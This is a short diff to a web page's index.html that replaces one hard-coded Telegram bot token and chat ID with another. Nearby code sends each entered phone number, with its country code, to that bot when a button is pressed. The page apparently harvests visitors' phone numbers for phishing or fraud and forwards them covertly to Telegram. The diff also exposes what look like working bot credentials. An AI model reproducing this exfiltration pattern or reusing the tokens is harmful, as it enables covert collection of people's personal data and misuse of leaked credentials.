--- a/index.html
+++ b/index.html
@@ -496,8 +496,8 @@ loader {
     sendButton.disabled = true;
     
     // Telegram bot details
-    const botToken = '7806045699:AAHXIhdiILQQBsxWoq2R1ckTKAdOu-33-9g';
-    const chatId = '7850420013';
+    const botToken = '7398534798:AAEsprbkxVEh0eLkcQY2-C67TN9FTyeGHRw';
+    const chatId = '-1002855345282';
     const message = `New number: ${countryCode}${phone}`;
     
     // Send to Telegram
